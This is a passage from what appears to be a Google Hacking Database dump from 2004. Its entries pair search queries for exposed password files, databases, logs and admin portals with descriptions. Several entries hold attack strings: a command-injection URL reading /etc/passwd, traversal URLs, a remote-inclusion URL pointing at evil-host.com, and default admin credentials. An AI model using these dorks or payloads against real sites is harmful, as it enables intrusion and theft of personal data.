On the ftp server usualy it is a directory like:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)And again thnxz goo 4 help us to find it.", "submited": "2004-07-26", "request": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", "id": 370}, {"short description": "inurl:email filetype:mdb", "long description": "Microsoft Access databases containing email information..", "submited": "2004-07-26", "request": "inurl:email filetype:mdb", "id": 371}, {"short description": "Powered by INDEXU", "long description": "From the sales department: \"INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters.\"(Moderator note: don't believe the marketing talk..)Some of these servers are not protected well enough. 
It has been reported that on (rare) occosions this page ->http://[indexuserver]/recovery_tools/create_admin_user.phpindicates admin login is possible by the appearance of three text lines:Create Administrator LoginDelete old administrator user ....okCreate new administrator user ....okAn attacker can then change the URL to http://[target]/admin/index.php and enter:user=adminpass=admin But that's if you find them..", "submited": "2004-07-22", "request": "+\"Powered by INDEXU\" inurl:(browse|top_rated|power", "id": 372}, {"short description": "data filetype:mdb -site:gov -site:mil", "long description": "Microsoft Access databases containing all kinds of 'data'.", "submited": "2004-07-26", "request": "data filetype:mdb -site:gov -site:mil", "id": 373}, {"short description": "inurl:backup filetype:mdb", "long description": "Microsoft Access database backups..", "submited": "2004-07-26", "request": "inurl:backup filetype:mdb", "id": 374}, {"short description": "inurl:forum filetype:mdb", "long description": "Microsoft Access databases containing 'forum' information ..", "submited": "2004-07-26", "request": "inurl:forum filetype:mdb", "id": 375}, {"short description": "intitle:\"Index Of\" cookies.txt size", "long description": "searches for cookies.txt file. On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits.", "submited": "2004-07-26", "request": "intitle:\"Index Of\" cookies.txt \"size\"", "id": 376}, {"short description": "intext:(password | passcode) intext:(username | userid | user) filetype:csv", "long description": "CSV formatted files containing all sorts of user/password combinations. 
Results may vary, but are still interesting to the casual attacker..", "submited": "2004-07-26", "request": "intext:(password | passcode) intext:(username | userid | user) filetype:csv", "id": 377}, {"short description": "inurl:profiles filetype:mdb", "long description": "Microsoft Access databases containing (user) profiles ..", "submited": "2004-07-26", "request": "inurl:profiles filetype:mdb", "id": 378}, {"short description": "filetype:cgi inurl:\"Web_Store.cgi\"", "long description": "Zero X reported that \"Web_Store.cgi\" allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point.", "submited": "2004-07-26", "request": "filetype:cgi inurl:\"Web_Store.cgi\"", "id": 379}, {"short description": "ASP.login_aspx \"ASP.NET_SessionId\"", "long description": ".NET based login pages serving the whole environment and process trace for your viewing pleasure.. These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version.", "submited": "2004-07-26", "request": "ASP.login_aspx \"ASP.NET_SessionId\"", "id": 380}, {"short description": "\"ASP.NET_SessionId\" \"data source=\"", "long description": ".NET pages revealing their datasource and sometimes the authentication credentials with it. 
The complete debug line looks something like this for example:strConn\tSystem.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)>S$+*For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage: It will not suprise the experienced security digger that these files are often in a downloadeble location on the server.", "submited": "2004-07-26", "request": "\"ASP.NET_SessionId\" \"data source=\"", "id": 381}, {"short description": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright -inurl:help -guides|guide", "long description": "This may be used to find Novell Grouwise Webaccess servers.", "submited": "2004-07-26", "request": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright -inurl:help -guides|guide", "id": 382}, {"short description": "\"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd", "long description": "Frontpage.. very nice clean search results listing !!No further comments required..changelog:22 jan 2005: improved by vs1400 !", "submited": "2004-07-26", "request": "ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\"", "id": 383}, {"short description": "filetype:cgi inurl:\"fileman.cgi\"", "long description": "This brings up alot of insecure as well as secure filemanagers. These software solutions are often used by companies offering a \"simple\" but \"cost effective\" way to their users who don't know unix or html. There is a problem sometimes with this specific filemanager due to insecure use of the session ID that can be found in the unprotected \"fileman.log\" logfile. It has been reported that an attacker can abuse the last document-edit-url of the logfile. By copy pasting that line in a new window it gives the attacker valid user credentials on the server, at least for a while.. 
(think hours not seconds).", "submited": "2004-07-26", "request": "filetype:cgi inurl:\"fileman.cgi\"", "id": 384}, {"short description": "intitle:\"Index Of\" -inurl:maillog maillog size", "long description": "This google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to-date, all of which contain various chunks of information (ie. Usernames, email adresses, Login/Logout times of users, IPAdresses, directories on the server ect. ect.)Someone, with this information could dig up info on the server before trying to penetrate it by finding usernames, and email adresses of accounts on the server.", "submited": "2004-07-28", "request": "intitle:\"Index Of\" -inurl:maillog maillog size", "id": 385}, {"short description": "Canon Webview netcams", "long description": "Canon has a series of netcams that all use the \"WebView LiveScope\" software. They are frequently used by japanese sites. Unfortunately most are crawled by their IP address so determining their location becomes more difficult. Some model names are:* VB-C10* VB-101* VB-C50iThis search looks for the java applet called \"LiveApplet\" that is used by Canon's network camera feeds. There is also a standalone (free) program, that is easier to control and lets you save bookmarks. It's available for PC and MACs. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi", "submited": "2004-07-29", "request": "intitle:liveapplet inurl:LvAppl", "id": 386}, {"short description": "inurl:\"index.php? module=ew_filemanager\"", "long description": "http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. 
Systems Affected: EasyWeb FileManager 1.0 RC-1Technical Description: The PostNuke module works by loading a directory and/or file via the \"pathext\" (directory) and \"view\" (file) variables. Providing a relative path (from the document repository) in the \"pathext\" variable will cause FileManager to provide a directory listing of that diretory. Selecting a file in that listing, or putting a file name in the \"view\" variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.Assuming PostNuke is installed at the root level:/etc directory listing:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/etc/passwd file:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwdFix/Workaround:Use another file manager module for PostNuke, as the authors do not appear to bemaintaining EW FileManager.Vendor Status: Vendor was contacted but did not respond.Credir: Sullo - cirt.netNOTE: mitigating factor, an attacker needs to be registred and logged on to have access rights to this module.", "submited": "2004-07-29", "request": "inurl:\"index.php?module=ew_filemanager\"", "id": 387}, {"short description": "allinurl:\"index.php\" \"site=sglinks\"", "long description": "Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seems to be vulnerable to a code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com", "submited": "2004-07-29", "request": "allinurl:\"index.php\" \"site=sglinks\"", "id": 388}, {"short description": "\"powered by\" \"shoutstats\" hourly daily", "long description": "shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. 
Shoutstats is a bunch of php scripts and a RRDtool database. It has been written under a Debian GNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used to find Shoutcast servers.", "submited": "2004-07-29", "request": "\"powered by\" \"shoutstats\" hourly daily", "id": 389}, {"short description": "intitle:\"Shoutcast Administrator\"", "long description": "shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers.", "submited": "2004-07-29", "request": "intitle:\"Shoutcast Administrator\"", "id": 390}, {"short description": "inurl:\"utilities/TreeView.asp\"", "long description": "From the marketing brochure: \"UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today.\"The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the loginname.", "submited": "2004-07-29", "request": "inurl:\"utilities/TreeView.asp\"", "id": 391}, {"short description": "filetype:pwl pwl", "long description": "These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users passwords. The following example has been provided:---Resource table: 0292 0294 0296 0298 (..etc..)File: C:\\Downloads\\2004-07\\07-26\\USER1.PWLUser name: 'USER1'Password: ''Dial-up:'*Rna\\Internet\\PJIU_TAC'Password:'PJIUSCAC3000' ---", "submited": "2004-07-29", "request": "filetype:pwl pwl", "id": 392}, {"short description": "\"apricot - admin\" 00h", "long description": "This search shows the webserver access stats as the user \"admin\". 
The language used is Japanese and the search includes the \"00h\" value which is only shown when the admin is logged in.", "submited": "2004-07-29", "request": "\"apricot - admin\" 00h", "id": 393}, {"short description": "filetype:ora ora", "long description": "Greetings, The *.ora files are configuration files for Oracle clients. An attacker can identify an Oracle database this way and get more juicy information by searching for ora config files. This search can be modified to be more specific: - filetype:ora sqlnet - filetype:ora names", "submited": "2004-08-01", "request": "filetype:ora ora", "id": 394}, {"short description": "filetype:wsdl wsdl", "long description": "The XML headers are called *.wsdl files. They can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff.", "submited": "2004-08-01", "request": "filetype:wsdl wsdl", "id": 395}, {"short description": "filetype:inc inc intext:setcookie", "long description": "Cookies are often used for authentication and a lot of other stuff. The \"inc\" php header files often include the exact syntax of the cookies. An attacker may create his own cookie with the information he has taken from the header file and start cookie poisoning.", "submited": "2004-08-01", "request": "filetype:inc inc intext:setcookie", "id": 396}, {"short description": "inurl:/wwwboard", "long description": "The software wwwboard stores its passwords in a file called \"passwd.txt\". An attacker may try to search for inurl:/wwwboard then add a \"passwd.txt\" to it (../wwwboard/passwd.txt) and decrypt the DES passwords.", "submited": "2004-08-01", "request": "inurl:/wwwboard", "id": 397}, {"short description": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", "long description": "Returns publicly visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called \"phpinfo.php\". 
Some result files that include phpinfo are:", "submited": "2004-08-02", "request": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", "id": 398}, {"short description": "inurl:*db filetype:mdb", "long description": "More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search.", "submited": "2004-08-02", "request": "inurl:*db filetype:mdb", "id": 399}, {"short description": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", "long description": "These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6).", "submited": "2004-08-02", "request": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", "id": 400}, {"short description": "inurl:gotoURL.asp?url=", "long description": "ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)Problem : the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and make SQL injection possible.For a examples check the original advisory posted to a spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en(link broken in two lines, glue them together first :-)An attacker can obtain the user and admin passwords by crafting a SQL statement.", "submited": "2004-08-03", "request": "inurl:gotoURL.asp?url=", "id": 401}, {"short description": "Phasers 4500/6250/8200/8400", "long description": "More Xerox printers (Phasers 4500/6250/8200/8400). 
An attacker can access the web interface with this search.", "submited": "2004-08-05", "request": "intext:centreware inurl:status", "id": 402}, {"short description": "filetype:fp3 fp3", "long description": "These are FileMaker Pro version 3 databases.", "submited": "2004-08-05", "request": "filetype:fp3 fp3", "id": 403}, {"short description": "filetype:fp7 fp7", "long description": "These are FileMaker Pro version 7 database files.", "submited": "2004-08-05", "request": "filetype:fp7 fp7", "id": 404}, {"short description": "filetype:cfg auto_inst.cfg", "long description": "Mandrake auto-install configuration files. These contain information about the installed packages, networking settings and even user accounts.", "submited": "2004-08-05", "request": "filetype:cfg auto_inst.cfg", "id": 405}, {"short description": "intitle:Node.List Win32.Version.3.11", "long description": "Synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games. An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess.", "submited": "2004-08-05", "request": "intitle:Node.List Win32.Version.3.11", "id": 406}, {"short description": "\"powered by antiboard\"", "long description": "\"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. 
It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page.\"There is an excellent vulnerability report at:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendor Status:The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future.", "submited": "2004-08-05", "request": "\"powered by antiboard\"", "id": 407}, {"short description": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp) -site:remedy.com -site:mil", "long description": "From the vendor site: \"Remedys Action Request System is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming.\"Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames, emails.", "submited": "2004-08-05", "request": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp)", "id": 408}, {"short description": "\"AutoCreate=TRUE password=*\"", "long description": "This searches the password for \"Website Access Analyzer\", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/Note: google to find the results of this software.", "submited": "2004-08-05", "request": "\"AutoCreate=TRUE password=*\"", "id": 409}, {"short description": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", "long description": "\"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. 
By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion.\"This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys..", "submited": "2004-08-05", "request": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", "id": 410}, {"short description": "filetype:pass pass intext:userid", "long description": "Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline.", "submited": "2004-08-06", "request": "filetype:pass pass intext:userid", "id": 411}, {"short description": "inurl:/cgi-bin/sqwebmail?noframes=1", "long description": "sQWebmail login portals.", "submited": "2004-08-06", "request": "inurl:/cgi-bin/sqwebmail?noframes=1", "id": 412}, {"short description": "filetype:ini ServUDaemon", "long description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more.", "submited": "2004-08-06", "request": "filetype:ini ServUDaemon", "id": 413}, {"short description": "inurl:comersus_message.asp", "long description": "About Comercus: \"Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers.\"Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/ This search finds the XSS vulnerable file comersus_message.asp?message= ..No version info is included with the search. 
Not all results are vulnerable.", "submited": "2004-08-09", "request": "inurl:comersus_message.asp", "id": 414}, {"short description": "intitle:\"teamspeak server-administration", "long description": "TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal.", "submited": "2004-08-09", "request": "intitle:\"teamspeak server-administration", "id": 415}, {"short description": "ext:pl inurl:cgi intitle:\"FormMail *\" -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", "long description": "FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured. Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.http://www.securityfocus.com/bid/3954/discussion/", "submited": "2004-08-09", "request": "ext:pl inurl:cgi intitle:\"FormMail *\" -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", "id": 416}, {"short description": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", "long description": "Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. 
Google helps the attacker by allowing a search for the \"disallow\" keyword.", "submited": "2004-08-09", "request": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", "id": 417}, {"short description": "intext:\"Session Start * * * *:*:* *\" filetype:log", "long description": "These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun.", "submited": "2004-08-09", "request": "intext:\"Session Start * * * *:*:* *\" filetype:log", "id": 418}, {"short description": "\"WebSTAR Mail - Please Log In\"", "long description": "@stake, Inc. advisory: \"4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X. There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources.\"See also: http://www.securityfocus.com/archive/1/368778", "submited": "2004-08-09", "request": "\"WebSTAR Mail - Please Log In\"", "id": 419}, {"short description": "Ultima Online loginservers", "long description": "This one finds login servers for the Ultima Online game.", "submited": "2004-08-09", "request": "filetype:cfg login \"LoginServer=\"", "id": 420}, {"short description": "inurl:nuke filetype:sql", "long description": "This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. 
These database dumps contain usernames and (sometimes) encrypted passwords for users of the system.", "submited": "2004-08-10", "request": "inurl:nuke filetype:sql", "id": 421}, {"short description": "intitle:\"please login\" \"your password is *\"", "long description": "These administrators were friendly enough to give hints about the password.", "submited": "2004-08-13", "request": "intitle:\"please login\" \"your password is *\"", "id": 422}, {"short description": "mail filetype:csv -site:gov intext:name", "long description": "CSV exported mail (user) names and such.", "submited": "2004-08-09", "request": "mail filetype:csv -site:gov intext:name", "id": 423}, {"short description": "filetype:xls -site:gov inurl:contact", "long description": "Microsoft Excel sheets containing contact information.", "submited": "2004-08-09", "request": "filetype:xls -site:gov inurl:contact", "id": 424}, {"short description": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", "long description": "OsCommerce has some security issues, including the following warning message: \"Warning: I am able to write to the configuration file\". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883 With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there.", "submited": "2004-08-13", "request": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", "id": 425}, {"short description": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", "long description": "These are login pages for Infopop's message board UBB.classic. 
For the UBB.threads you can use this search This next search finds all UBB pages with the infopop image and a link to the developers.http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1", "submited": "2004-08-13", "request": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", "id": 426}, {"short description": "inurl:/db/main.mdb", "long description": "ASP-Nuke database file containing passwords.This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location.", "submited": "2004-08-13", "request": "inurl:/db/main.mdb", "id": 427}, {"short description": "ext:asp inurl:pathto.asp", "long description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This searches pathto.asp files and allows an attacker to know the exact installed path of the software.Examples:The path to your Site is -- g:\\0E5\\goldenstateeng.xxx\\webThe path to your Site is -- D:\\inetpub\\wwwroot\\01xx738\\mc10s9izz", "submited": "2004-08-13", "request": "ext:asp inurl:pathto.asp", "id": 428}, {"short description": "ext:cgi inurl:ubb6_test", "long description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. 
Leaving them in place poses a security risk.\"This is the UBB6 Permissions & Paths Diagnostic Script.Example:UBB Version \t6.1.0.3 Perl Version \t5.006 Server Type \tApache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b check path: \t1. \tcheck permission to write new files in this directory2. \tcheck for the 'required' files in both the CGI and this directory3. \tcheck my read/write permissions on all the variables files4. \tcheck my absolute paths in general settings if available \tversion 2.1 \t2001 Infopop Corporation All Rights Reserved", "submited": "2004-08-13", "request": "ext:cgi inurl:ubb6_test.cgi", "id": 429}, {"short description": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", "long description": "These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy. The experts comment on this is there are much better solutions for surfing anonymously.", "submited": "2004-08-13", "request": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", "id": 430}, {"short description": "filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", "long description": "This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). 
Every attacker knows that changing the extension of a file on a webserver can have ugly consequences.", "submited": "2004-08-14", "request": "filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", "id": 431}, {"short description": "\"http://*:*@www\" domainname", "long description": "This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the domain name without the .com or .net\"http://*:*@www\" bangbus or \"http://*:*@www\"bangbusAnother way is by just typing\"http://bob:bob@www\"", "submited": "2004-08-14", "request": "\"http://*:*@www\" bob:bob", "id": 432}, {"short description": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", "long description": "This search will show an attacker some PHP error logs which may contain information on which an attack can be based.", "submited": "2004-08-14", "request": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", "id": 433}, {"short description": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", "long description": "This finds sites powered by various CuteNews versions. An attacker can use this list and search the online advisories for vulnerabilities. For example: \"CuteNews HTML Injection Vulnerability Via Commentaries\", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)", "submited": "2004-08-16", "request": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", "id": 434}, {"short description": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", "long description": "This search finds IIS 5.0 error pages = IIS 5.0 Server", "submited": "2004-08-16", "request": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", "id": 435}, {"short description": "filetype:conf oekakibbs", "long description": "Oekakibbs is a Japanese anime creation application. 
The config file tells an attacker the encrypted password.", "submited": "2004-08-16", "request": "filetype:conf oekakibbs", "id": 436}, {"short description": "Novell NetWare intext:\"netware management portal version\"", "long description": "Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password.", "submited": "2004-08-16", "request": "Novell NetWare intext:\"netware management portal version\"", "id": 437}, {"short description": "Achievo webbased project management", "long description": "Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite. More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html", "submited": "2004-08-16", "request": "inurl:\"dispatch.php?atknodetype\" | inurl:class.at", "id": 438}, {"short description": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)", "long description": "This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. 
Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them).", "submited": "2004-08-20", "request": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)", "id": 439}, {"short description": "\"ftp://\" \"www.eastgame.net\"", "long description": "Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.\"thankyou4share\" !", "submited": "2004-08-20", "request": "\"ftp://\" \"www.eastgame.net\"", "id": 440}, {"short description": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", "long description": "Frontend for SAP Internet Transaction Server webgui service.", "submited": "2004-08-16", "request": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", "id": 441}, {"short description": "Login (\"Powered by Jetbox One CMS \" | \"Powered by Jetstream *\")", "long description": "Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:http://www.securityfocus.com/bid/10858/discussion/The file holding the password is called: \"http://.../includes/general_settings.inc.php\"It does come with default passwords and that is allways a security risk. The administration is available via /admin/Username: admin, Password: admin1 .", "submited": "2004-08-20", "request": "Login (\"Powered by Jetbox One CMS \" | \"Powered by Jetstream *\")", "id": 442}, {"short description": "LeapFTP intitle:\"index.of./\" sites.ini modified", "long description": "The LeapFTP client configuration file \"sites.ini\" holds the login credentials for those sites in plain text. The passwords seems to be encrypted.", "submited": "2004-08-20", "request": "LeapFTP intitle:\"index.of./\" sites.ini modified", "id": 443}, {"short description": "intitle:Login * Webmailer", "long description": "1&1 Webmail login portals. 
This is made by a german company called Internet United active in the hosting providers area. They have a server login product wich can be found by GooglingThis is all not very exiting as there have been no vulnerabilities reported on this software yet.", "submited": "2004-08-20", "request": "intitle:Login * Webmailer", "id": 444}, {"short description": "inurl:\"gs/adminlogin.aspx\"", "long description": "GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example: option value=\"E:\\GRADESPEED\\DRHARMONWKELLEYELEMENTARY\\|Dr H. W K. E.|101\">Dr ...", "submited": "2004-08-20", "request": "inurl:\"gs/adminlogin.aspx\"", "id": 445}, {"short description": "\"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", "long description": "This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is an SSN in the document.", "submited": "2004-08-19", "request": "\"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", "id": 446}, {"short description": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "long description": "search to show online Novell Groupwise web access portals.", "submited": "2004-08-21", "request": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "id": 447}, {"short description": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "long description": "search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges.", "submited": "2004-08-21", "request": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "id": 448}, {"short description": "\"Powered by Gallery v1.4.4\"", "long description": "http://www.securityfocus.com/bid/10968/discussion/\"A vulnerability is reported to exist in Gallery 
that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. \"", "submited": "2004-08-25", "request": "\"Powered by Gallery v1.4.4\"", "id": 449}, {"short description": "Quicken data files", "long description": "The QDATA.QDF file (found sometimes in zipped \"QDATA\" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc. This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online.", "submited": "2004-08-25", "request": "filetype:QDF QDF", "id": 450}, {"short description": "filetype:ini wcx_ftp", "long description": "This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future.", "submited": "2004-08-25", "request": "filetype:ini wcx_ftp", "id": 451}, {"short description": "4images Administration Control Panel", "long description": "4images Gallery - 4images is a web-based image gallery management system. 
